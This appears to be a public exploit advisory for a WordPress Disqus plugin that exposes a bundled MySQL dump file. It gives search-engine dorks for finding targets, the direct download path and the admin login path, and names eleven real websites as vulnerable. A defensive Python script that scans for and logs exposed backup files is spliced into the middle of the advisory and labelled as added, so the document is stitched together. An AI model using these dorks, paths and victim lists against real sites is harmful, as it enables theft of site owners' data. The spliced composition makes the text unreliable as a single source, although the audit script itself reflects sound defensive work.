WordPress Disqus Comment System plugin version 2.87 suffers from a database disclosure vulnerability.
#################################################################################################
# Exploit Title : WordPress Disqus Comment System Plugins 2.87 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 08/12/2018
# Vendor Homepage : disqus.com ~ wordpress.org/plugins/disqus-comment-system/
# Software Download Link : github.com/clearhead/clearhead.me/archive/master.zip + github.com/clearhead/clearhead.me/blob/master/wp-content/plugins/disqus-comment-system/tests/initial.sql
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.87 and 3.0
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/disqus-comment-system/tests/''
intext:''Greyzed Theme created by The Forge Web Creations. Powered by WordPress.''
intext:''© 2008 - 2018 Grazitti Interactive. All rights reserved''
intext:''HyTrade Marketing & Comunicação © 2017 | Todos direitos reservados''
intext:''© 2018 Chainbit, LLC. All rights reserved''
intext:''Copyright 2015 / CIP Data Collection Ltd Company No. 10462735''
intext:''© 2017 Longlife Magazine - All Rights Reserved.''
intext:''© Copyright Feira Cultural 2017. Todos os direitos reservado''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
-- MySQL dump 10.13 Distrib 5.1.48, for apple-darwin10.4.0 (i386)
--
-- Host: localhost Database: wordpress
-- ------------------------------------------------------
-- Server version 5.1.48
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/plugins/disqus-comment-system/tests/initial.sql
#################################################################################################
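The exposure above is a plain MySQL dump shipped inside the plugin's tests directory and served by the web server as a static file. As an added defensive example, not part of this advisory, the following Python audits a local WordPress tree for dump/backup files left under wp-content and flags access-log requests for such files, distinguishing requests that were actually served (2xx) from ones that were blocked. The function names (find_exposed_backups, flag_backup_requests, build_demo_webroot), the extension list, the log lines and IPs, and the temporary tree are all constructed for this example.

```python
import re
import tempfile
from pathlib import Path

# Constructed sample access-log lines (combined log format); IPs are documentation
# addresses and the request paths mirror the file named in the advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Dec/2018:10:01:22 +0000] "GET /wp-content/plugins/disqus-comment-system/tests/initial.sql HTTP/1.1" 200 18342 "-" "Mozilla/5.0"
203.0.113.5 - - [08/Dec/2018:10:01:40 +0000] "GET /wp-login.php HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
198.51.100.9 - - [08/Dec/2018:10:02:01 +0000] "GET /blog/wp-content/plugins/disqus-comment-system/tests/initial.sql?x=1 HTTP/1.1" 403 199 "-" "curl/7.61.0"
198.51.100.9 - - [08/Dec/2018:10:02:15 +0000] "GET /index.php HTTP/1.1" 200 9120 "-" "curl/7.61.0"
"""

# File types that have no business being reachable under wp-content (assumed list).
BACKUP_EXTENSIONS = (".sql", ".sql.gz", ".bak", ".old", ".zip", ".tar.gz")

# Minimal parser for Apache/nginx combined log lines: client, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def is_backup_path(path: str) -> bool:
    """True if the request path points at a dump/backup-like file under wp-content."""
    p = path.split("?", 1)[0].lower()          # ignore any query string
    return "/wp-content/" in p and p.endswith(BACKUP_EXTENSIONS)


def flag_backup_requests(log_text: str) -> list[dict]:
    """Return one record per request for a backup-like file; 'served' is True for 2xx responses."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_backup_path(m["path"]):
            continue
        status = int(m["status"])
        hits.append({
            "ip": m["ip"],
            "path": m["path"],
            "status": status,
            "served": 200 <= status < 300,
        })
    return hits


def find_exposed_backups(webroot: Path) -> list[str]:
    """Walk wp-content and list files a web server would hand out as static backups/dumps."""
    found = []
    for f in (webroot / "wp-content").rglob("*"):
        if f.is_file() and f.name.lower().endswith(BACKUP_EXTENSIONS):
            found.append(f.relative_to(webroot).as_posix())
    return sorted(found)


def build_demo_webroot() -> Path:
    """Construct a throwaway WordPress-like tree containing one stray SQL dump (not a real install)."""
    root = Path(tempfile.mkdtemp())
    plugin = root / "wp-content" / "plugins" / "disqus-comment-system"
    (plugin / "tests").mkdir(parents=True)
    (plugin / "tests" / "initial.sql").write_text("-- MySQL dump 10.13 (constructed sample)\n")
    (plugin / "disqus.php").write_text("<?php\n")
    return root


if __name__ == "__main__":
    for hit in flag_backup_requests(SAMPLE_LOG):
        print("served" if hit["served"] else "blocked", hit["ip"], hit["path"])
    for rel in find_exposed_backups(build_demo_webroot()):
        print("exposed on disk:", rel)
```

A 200 on a path like this is the signal that the dump has already left the server, so the log check is a post-incident triage step; the filesystem audit is the preventive one, and any hit there should be removed from the web root or denied in the server configuration rather than left in place.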
# Example Vulnerable Sites =>
[+] therussianlinesman.com/blog/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] hytrade.com.br/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] grazitti.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] paulsforza.com/wordpress/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] combbo.com.br/cmb/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] uof7.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] ecommerceandb2b.com/b2bblog/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] cipmetering.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] soogran.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] longlifemagz.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] feiracultural.art.br/wp-content/plugins/disqus-comment-system/tests/initial.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################